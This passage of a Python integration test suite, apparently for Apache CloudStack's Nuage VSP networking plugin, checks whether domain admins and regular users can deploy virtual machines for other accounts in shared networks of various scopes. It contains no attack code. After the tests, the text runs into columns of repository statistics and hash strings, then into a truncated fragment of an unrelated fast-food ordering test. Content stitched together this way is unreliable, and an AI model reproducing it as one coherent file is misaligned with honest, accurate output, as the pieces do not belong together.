self.sharednetworkdata["vmD11"]["displayname"] + \
"-shared-scope-domain-nosubdomainaccess-domain-admin"
vm = self.create_VM(self.shared_network_domain_d11,
testdata=self.vmdata, account=self.account_d11,
cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d11.name and
vm.domainid == self.account_d11.domainid,
True,
"Admin User in a domain that has a shared network with no "
"subdomain access failed to Deploy VM in a shared network with "
"scope=domain with no subdomain access")
self.verify_vsd_shared_network(
self.account_d11.domainid,
self.shared_network_domain_d11,
gateway=self.nuagenetworkdata[
"network_domain_with_no_subdomain_access"]["gateway"])
subnet_id = self.get_subnet_id(
self.shared_network_domain_d11.id,
self.nuagenetworkdata[
"network_domain_with_no_subdomain_access"]["gateway"])
self.verify_vsd_enterprise_vm(self.account_d11.domainid,
self.shared_network_domain_d11, vm,
sharedsubnetid=subnet_id)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_nosubdomaccess_subdomusr(
self):
"""Validate that Domain admin is NOT able to deploy a VM for sub domain
user in a shared network with scope=Domain and no subdomain access
"""
# Deploy VM as user in a subdomain under a domain that has shared
# network with no subdomain access
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD111A"]["name"] + \
"-shared-scope-domain-nosubdomainaccess-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD111A"]["displayname"] + \
"-shared-scope-domain-nosubdomainaccess-domain-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_domain_d11.id,
accountid=self.account_d111a.name,
domainid=self.account_d111a.domainid
)
self.fail(
"Domain admin is able to deploy VM for sub domain user in a "
"shared network with scope=Domain and no subdomain access")
except Exception as e:
self.debug(
"When a user from a subdomain deploys a VM in a shared "
"network with scope=domain with no subdomain access %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
self.fail(
"Error message validation failed when Domain admin tries "
"to deploy a VM for sub domain user in a shared network "
"with scope=Domain and no subdomain access")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_nosubdomaccess_subdomadm(
self):
"""Valiadte that Domain admin is NOT able to deploy a VM for sub domain
admin user in a shared network with scope=Domain and no subdomain
access
"""
# Deploy VM as an admin user in a subdomain under a domain that has
# shared network with no subdomain access
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD111"]["name"] + \
"-shared-scope-domain-nosubdomainaccess-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD111"]["displayname"] + \
"-shared-scope-domain-nosubdomainaccess-domain-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_domain_d11.id,
accountid=self.account_d111.name,
domainid=self.account_d111.domainid
)
self.fail(
"Domain admin is able to deploy a VM for sub domain admin "
"user in a shared network with scope=Domain no subdomain "
"access")
except Exception as e:
self.debug(
"When a admin user from a subdomain deploys a VM in a shared "
"network with scope=domain with no subdomain access %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
self.fail(
"Error message validation failed when Domain admin tries "
"to deploy a VM for sub domain admin user in a shared "
"network with scope=Domain and no subdomain access ")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_nosubdomaccess_pardomusr(
self):
"""Validate that Domain admin is NOT able to deploy a VM for parent
domain user in a shared network with scope=Domain and no subdomain
access
"""
# Deploy VM as user in parentdomain of a domain that has shared network
# with no subdomain access
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD1A"]["name"] + \
"-shared-scope-domain-nosubdomainaccess-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD1A"]["displayname"] + \
"-shared-scope-domain-nosubdomainaccess-domain-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_domain_d11.id,
accountid=self.account_d1a.name,
domainid=self.account_d1a.domainid
)
self.fail(
"Domain admin is able to deploy a VM for parent domain user "
"in a shared network with scope=Domain and no subdomain "
"access")
except Exception as e:
self.debug(
"When a user from parent domain deploys a VM in a shared "
"network with scope=domain with no subdomain access %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
self.fail(
"Error message validation failed when Domain admin tries "
"to deploy a VM for parent domain user in a shared "
"network with scope=Domain and no subdomain access ")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_nosubdomaccess_pardomadm(
self):
"""Validate that Domain admin is NOT able to deploy VM for parent
domain admin user in shared network with scope=Domain and no subdomain
access
"""
# Deploy VM as an admin user in parentdomain of a domain that has
# shared network with no subdomain access
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD1"]["name"] + \
"-shared-scope-domain-nosubdomainaccess-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD1"]["displayname"] + \
"-shared-scope-domain-nosubdomainaccess-domain-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_domain_d11.id,
accountid=self.account_d1.name,
domainid=self.account_d1.domainid
)
self.fail(
"Domain admin is able to deploy VM for parent domain admin "
"user in a shared network with scope=Domain no subdomain "
"access")
except Exception as e:
self.debug(
"When an admin user from parent domain deploys a VM in a "
"shared network with scope=domain with no subdomain access %s"
% e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
self.fail(
"Error message validation failed when Domain admin tries "
"to deploy a VM for parent domain admin user in a shared "
"network with scope=Domain and no subdomain access ")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_nosubdomaccess_ROOTuser(
self):
"""Validate that Domain admin is NOT able to deploy a VM for user in
ROOT domain in a shared network with scope=Domain and no subdomain
access
"""
# Deploy VM as user in ROOT domain
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmROOTA"]["name"] + \
"-shared-scope-domain-nosubdomainaccess-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmROOTA"]["displayname"] + \
"-shared-scope-domain-nosubdomainaccess-domain-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_domain_d11.id,
accountid=self.account_roota.name,
domainid=self.account_roota.domainid
)
self.fail(
"Domain admin is able to deploy a VM for user in ROOT domain "
"in a shared network with scope=Domain and no subdomain "
"access")
except Exception as e:
self.debug(
"When a regular user from ROOT domain deploys a VM in a "
"shared network with scope=domain with no subdomain access %s"
% e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NO_PERMISSION_TO_OPERATE_DOMAIN):
self.fail(
"Error message validation failed when Domain admin tries "
"to deploy a VM for user in ROOT domain in a shared "
"network with scope=Domain and no subdomain access")
# Test cases relating to deploying Virtual Machine as Domain admin for
# other users in shared network with scope=Domain and with subdomain access
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_subdomaccess_domainuser(
self):
"""Validate that Domain admin is able to deploy a VM for regular user
in domain in a shared network with scope=Domain and subdomain access
"""
# Deploy VM as user in a domain that has shared network with subdomain
# access
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD11A"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD11A"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-domain-admin"
vm = self.create_VM(self.shared_network_domain_with_subdomain_d11,
testdata=self.vmdata, account=self.account_d11a,
cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d11a.name and
vm.domainid == self.account_d11a.domainid,
True,
"Domain admin is not able to deploy VM for regular user in domain "
"in a shared network with scope=Domain subdomain access")
self.verify_vsd_shared_network(
self.account_d11a.domainid,
self.shared_network_domain_with_subdomain_d11,
gateway=self.nuagenetworkdata[
"network_domain_with_subdomain_access"]["gateway"])
subnet_id = self.get_subnet_id(
self.shared_network_domain_with_subdomain_d11.id,
self.nuagenetworkdata[
"network_domain_with_subdomain_access"]["gateway"])
self.verify_vsd_enterprise_vm(
self.account_d11a.domainid,
self.shared_network_domain_with_subdomain_d11,
vm, sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_subdomaccess_domainadmin(
self):
"""Validate that Domain admin is able to deploy a VM for admin user in
domain in a shared network with scope=Domain and subdomain access
"""
# Deploy VM as an admin user in a domain that has shared network with
# subdomain access
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD11"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD11"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-domain-admin"
vm = self.create_VM(self.shared_network_domain_with_subdomain_d11,
testdata=self.vmdata, account=self.account_d11,
cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d11.name and
vm.domainid == self.account_d11.domainid,
True,
"Domain admin is not able to deploy a VM for admin user in domain "
"in a shared network with scope=Domain subdomain access")
self.verify_vsd_shared_network(
self.account_d11.domainid,
self.shared_network_domain_with_subdomain_d11,
gateway=self.nuagenetworkdata[
"network_domain_with_subdomain_access"]["gateway"])
subnet_id = self.get_subnet_id(
self.shared_network_domain_with_subdomain_d11.id,
self.nuagenetworkdata[
"network_domain_with_subdomain_access"]["gateway"])
self.verify_vsd_enterprise_vm(
self.account_d11.domainid,
self.shared_network_domain_with_subdomain_d11,
vm, sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_subdomaccess_subdomuser(
self):
"""Validate that Domain admin is able to deploy a VM for regular user
in subdomain in a shared network with scope=Domain and subdomain access
"""
# Deploy VM as user in a subdomain under a domain that has shared
# network with subdomain access
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD111A"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD111A"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-domain-admin"
vm = self.create_VM(self.shared_network_domain_with_subdomain_d11,
testdata=self.vmdata, account=self.account_d111a,
cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d111a.name and
vm.domainid == self.account_d111a.domainid,
True,
"Domain admin not able to deploy VM for regular user in subdomain "
"in shared network with scope=Domain subdomain access")
self.verify_vsd_shared_network(
self.account_d111a.domainid,
self.shared_network_domain_with_subdomain_d11,
gateway=self.nuagenetworkdata[
"network_domain_with_subdomain_access"]["gateway"])
subnet_id = self.get_subnet_id(
self.shared_network_domain_with_subdomain_d11.id,
self.nuagenetworkdata[
"network_domain_with_subdomain_access"]["gateway"])
self.verify_vsd_enterprise_vm(
self.account_d111a.domainid,
self.shared_network_domain_with_subdomain_d11,
vm, sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_subdomaccess_subdomadmin(
self):
"""Validate that Domain admin is able to deploy a VM for admin user in
subdomain in a shared network with scope=Domain and subdomain access
"""
# Deploy VM as an admin user in a subdomain under a domain that has
# shared network with subdomain access
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD111"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD111"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-domain-admin"
vm = self.create_VM(self.shared_network_domain_with_subdomain_d11,
testdata=self.vmdata, account=self.account_d111,
cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d111.name and
vm.domainid == self.account_d111.domainid,
True,
"Domain admin is not able to deploy VM for admin user in "
"subdomain in a shared network with scope=Domain subdomain access")
self.verify_vsd_shared_network(
self.account_d111.domainid,
self.shared_network_domain_with_subdomain_d11,
gateway=self.nuagenetworkdata[
"network_domain_with_subdomain_access"]["gateway"])
subnet_id = self.get_subnet_id(
self.shared_network_domain_with_subdomain_d11.id,
self.nuagenetworkdata[
"network_domain_with_subdomain_access"]["gateway"])
self.verify_vsd_enterprise_vm(
self.account_d111.domainid,
self.shared_network_domain_with_subdomain_d11,
vm, sharedsubnetid=subnet_id)
# Deleting the VM
vm.delete(self.api_client, expunge=True)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_subdomaccess_pardomuser(
self):
"""Validate that Domain admin NOT able to deploy VM for regular user in
parent domain in shared network with scope=Domain subdomain access
"""
# Deploy VM as user in parentdomain of a domain that has shared network
# with subdomain access
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD1A"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD1A"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-domain-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_domain_with_subdomain_d11.id,
accountid=self.account_d1a.name,
domainid=self.account_d1a.domainid
)
self.fail(
" Domain admin is able to deploy VM for regular user in "
"parent domain in a shared network with scope=Domain "
"subdomain access")
except Exception as e:
self.debug(
"When a user from parent domain deploys a VM in a shared "
"network with scope=domain with subdomain access %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
self.fail(
"Error message validation failed when Domain admin tries "
"to deploy a VM for regular user in parent domain in a "
"shared network with scope=Domain and subdomain access")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_subdomaccess_pardomadmin(
self):
"""Validate that Domain admin is NOT able to deploy VM for admin user
in parent domain in shared network with scope=Domain subdomain access
"""
# Deploy VM as an admin user in parentdomain of a domain that has
# shared network with subdomain access
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD1"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD1"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-domain-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_domain_with_subdomain_d11.id,
accountid=self.account_d1.name,
domainid=self.account_d1.domainid
)
self.fail(
"Domain admin is able to deploy a VM for admin user in parent "
"domain in a shared network with scope=Domain subdomain "
"access")
except Exception as e:
self.debug(
"When an admin user from parent domain deploys a VM in a "
"shared network with scope=domain with subdomain access %s" %
e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NOT_AVAILABLE_IN_DOMAIN):
self.fail(
"Error message validation failed when Domain admin tries "
"to deploy a VM for admin user in parent domain in a "
"shared network with scope=Domain and subdomain access")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_subdomainaccess_ROOTuser(
self):
"""Validate that Domain admin is NOT able to deploy a VM for user in
ROOT domain in a shared network with scope=Domain and subdomain access
"""
# Deploy VM as user in ROOT domain
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmROOTA"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmROOTA"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-domain-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_domain_with_subdomain_d11.id,
accountid=self.account_roota.name,
domainid=self.account_roota.domainid
)
self.fail(
"Domain admin is able to deploy a VM for user in ROOT domain "
"in a shared network with scope=Domain and subdomain access")
except Exception as e:
self.debug(
"When a user from ROOT domain deploys a VM in a shared "
"network with scope=domain with subdomain access %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NO_PERMISSION_TO_OPERATE_DOMAIN):
self.fail(
"Error message validation failed when Domain admin tries "
"to deploy a VM for user in ROOT domain in a shared "
"network with scope=Domain and subdomain access")
# Test cases relating to deploying Virtual Machine as Domain admin for
# other users in shared network with scope=account
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_scope_account_domainuser(
self):
"""Validate that Domain admin is NOT able to deploy a VM for user in
the same domain but belonging to a different account in a shared
network with scope=account
"""
# Deploy VM as user in a domain under the same domain but different
# account from the acount that has a shared network with scope=account
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD111B"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD111B"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-domain-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_account_d111a.id,
accountid=self.account_d111b.name,
domainid=self.account_d111b.domainid
)
self.fail(
"Domain admin is able to deploy a VM for user in the same "
"domain but belonging to a different account in a shared "
"network with scope=account")
except Exception as e:
self.debug(
"When a user from same domain but different account deploys a "
"VM in a shared network with scope=account %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.UNABLE_TO_USE_NETWORK):
self.fail(
"Error message validation failed when Domain admin tries "
"to deploy a VM for user in the same domain but belonging "
"to a different account in a shared network with "
"scope=account")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_scope_account_domadmin(
self):
"""Validate that Domain admin is NOT able to deploy a VM for an admin
user in the same domain but belonging to a different account in a
shared network with scope=account
"""
# Deploy VM as admin user for a domain that has an account with shared
# network with scope=account
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD111"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD111"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-domain-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_account_d111a.id,
accountid=self.account_d111.name,
domainid=self.account_d111.domainid
)
self.fail(
"Domain admin is able to deploy a VM for user in the same "
"domain but belonging to a different account in a shared "
"network with scope=account")
except Exception as e:
self.debug(
"When a user from same domain but different account deploys a "
"VM in a shared network with scope=account %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.UNABLE_TO_USE_NETWORK):
self.fail(
"Error message validation failed when Domain admin tries "
"to deploy a VM for user in the same domain but belonging "
"to a different account in a shared network with "
"scope=account")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_scope_account_user(self):
"""Validate that Domain admin is able to deploy a VM for an regular
user in a shared network with scope=account
"""
# Deploy VM as account with shared network with scope=account
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD111A"]["name"] + \
"-shared-scope-domain-withsubdomainaccess-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD111A"]["displayname"] + \
"-shared-scope-domain-withsubdomainaccess-domain-admin"
vm = self.create_VM(self.shared_network_account_d111a,
testdata=self.vmdata, account=self.account_d111a,
cleanup=False)
self.assertEqual(
vm.state == "Running" and vm.account == self.account_d111a.name and
vm.domainid == self.account_d111a.domainid,
True,
"Domain admin is not able to deploy a VM for an regular user in a "
"shared network with scope=account")
self.verify_vsd_shared_network(self.account_d111a.domainid,
self.shared_network_account_d111a,
gateway=self.nuagenetworkdata[
"network_account"]["gateway"])
subnet_id = self.get_subnet_id(self.shared_network_account_d111a.id,
self.nuagenetworkdata[
"network_account"]["gateway"])
self.verify_vsd_enterprise_vm(self.account_d111a.domainid,
self.shared_network_account_d111a, vm,
sharedsubnetid=subnet_id)
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_scope_account_diffdomain(
self):
"""Validate that Domain admin is NOT able to deploy a VM for an
regular user from a different domain in a shared network with
scope=account
"""
# Deploy VM as an admin user in a subdomain under ROOT
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD2A"]["name"] + \
"-shared-scope-account-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD2A"]["displayname"] + \
"-shared-scope-account-domain-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_account_d111a.id,
accountid=self.account_d2a.name,
domainid=self.account_d2a.domainid
)
self.fail(
"Domain admin is able able to deploy a VM for an regular user "
"from a differnt domain in a shared network with "
"scope=account")
except Exception as e:
self.debug(
"When a user from different domain deploys a VM in a shared "
"network with scope=account %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NO_PERMISSION_TO_OPERATE_DOMAIN):
self.fail(
"Error message validation failed when Domain admin tries "
"to deploy a VM for an regular user from a differnt "
"domain in a shared network with scope=account")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_domainadmin_scope_account_ROOTuser(
self):
"""Validate that Domain admin is NOT able to deploy a VM for an regular
user in ROOT domain in a shared network with scope=account
"""
# Deploy VM as user in ROOT domain
self.api_client.connection.apiKey = self.user_d1_apikey
self.api_client.connection.securityKey = self.user_d1_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmROOTA"]["name"] + \
"-shared-scope-account-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmROOTA"]["displayname"] + \
"-shared-scope-account-domain-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_account_d111a.id,
accountid=self.account_roota.name,
domainid=self.account_roota.domainid
)
self.fail(
"Domain admin is able to deploy a VM for an regular user in "
"ROOT domain in a shared network with scope=account")
except Exception as e:
self.debug(
"When a user from ROOT domain deploys a VM in a shared "
"network with scope=account %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NO_PERMISSION_TO_OPERATE_DOMAIN):
self.fail(
"Error message validation failed when Domain admin tries "
"to deploy a VM for an regular user in ROOT domain in a "
"shared network with scope=account")
# Test cases relating to deploying Virtual Machine as Regular user for
# other users in shared network with scope=all
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_regularuser_scope_all_anotherusers(
self):
"""Validate that regular user is NOT able to deploy a VM for
another user in the same domain in a shared network with scope=all
"""
# Deploy VM for a user in a domain under ROOT as admin
self.api_client.connection.apiKey = self.user_d11a_apikey
self.api_client.connection.securityKey = self.user_d11a_secretkey
self.vmdata["name"] = \
self.sharednetworkdata["vmD11A"]["name"] + \
"-shared-scope-all-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD11A"]["displayname"] + \
"-shared-scope-all-domain-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_all.id,
accountid=self.account_d12a.name,
domainid=self.account_d12a.domainid
)
self.fail(
"Regular user is allowed to deploy a VM for another user in "
"the same domain in a shared network with scope=all")
except Exception as e:
self.debug(
"When a regular user deploys a VM for another user in the "
"same domain in a shared network with scope=all %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NO_PERMISSION_TO_OPERATE_ACCOUNT):
self.fail(
"Error message validation failed when Regular user tries "
"to deploy a VM for another user in the same domain in a "
"shared network with scope=all")
@attr(tags=["advanced", "nuagevsp"], required_hardware="false")
def test_deployVM_in_sharedNetwork_as_regularuser_scope_all_crossdomain(
self):
"""Validate that regular user is NOT able to deploy a VM for
another user in a different domain in a shared network with scope=all
"""
# Deploy VM for a user in a domain under ROOT as admin
self.api_client.connection.apiKey = self.user_d11a_apikey
self.api_client.connection.securityKey = self.user_d11a_secretkey
self.vmdata["name"] = self.sharednetworkdata["vmD11A"][
"name"] + "-shared-scope-all-domain-admin"
self.vmdata["displayname"] = \
self.sharednetworkdata["vmD11A"]["displayname"] + \
"-shared-scope-all-domain-admin"
try:
VirtualMachine.create(
self.api_client,
self.vmdata,
zoneid=self.zone.id,
serviceofferingid=self.service_offering.id,
templateid=self.template.id,
networkids=self.shared_network_all.id,
accountid=self.account_d2a.name,
domainid=self.account_d2a.domainid
)
self.fail(
"Regular user is allowed to deploy a VM for another user in "
"the same domain in a shared network with scope=all")
except Exception as e:
self.debug(
"When a regular user deploys a VM for another user in the "
"same domain in a shared network with scope=all %s" % e)
if not CloudstackAclException.verifyMsginException(
e,
CloudstackAclException.NO_PERMISSION_TO_OPERATE_ACCOUNT):
self.fail(
"Error message validation failed when Regular user tries "
"to deploy a VM for another user in the same domain in a "
"shared network with scope=all")
@staticmethod
def generateKeysForUser(api_client, account):
user = User.list(
api_client,
account=account.name,
domainid=account.domainid
)[0]
return (User.registerUserKeys(
api_client,
user.id
))
| 46.880047
| 79
| 0.605426
| 13,282
| 120,763
| 5.34927
| 0.026803
| 0.065504
| 0.046897
| 0.05264
| 0.947276
| 0.936227
| 0.932948
| 0.915523
| 0.910527
| 0.90287
| 0
| 0.01124
| 0.316339
| 120,763
| 2,575
| 80
| 46.898252
| 0.849324
| 0.116451
| 0
| 0.818182
| 0
| 0
| 0.219879
| 0.052113
| 0
| 0
| 0
| 0
| 0.011426
| 1
| 0.027819
| false
| 0
| 0.003477
| 0
| 0.03378
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f4bdbb7ac27cd945444d15baab470c3009c35898
| 3,498
|
py
|
Python
|
test/views/test_orders.py
|
brunocamposal/fast-food-simulator
|
6dc7f33cdebd222998fc88df9264853c741c64ca
|
[
"MIT"
] | 2
|
2021-01-11T23:47:17.000Z
|
2021-01-13T13:16:50.000Z
|
test/views/test_orders.py
|
brunocamposal/kitchin-kanri
|
6dc7f33cdebd222998fc88df9264853c741c64ca
|
[
"MIT"
] | 7
|
2021-01-13T13:16:46.000Z
|
2021-01-21T16:07:28.000Z
|
test/views/test_orders.py
|
brunocamposal/kitchin-kanri
|
6dc7f33cdebd222998fc88df9264853c741c64ca
|
[
"MIT"
] | null | null | null |
from test import app
import json
def test_Order_GET_request(app):
"""with app.test_client() as client:
response = client.get('/orders')
data = json.loads(response.data.decode())
assert data == {'data':
[
{'date': '2021-01-18T13:19:43', 'id': 2, 'payment_method': 'dinheiro', 'products': [], 'status': 'Pedido em andamento', 'total_price': 0.0},
{'date': '2021-01-18T13:23:40', 'id': 3, 'payment_method': 'dinheiro', 'products': [], 'status': 'Pedido Concluído', 'total_price': 0.0},
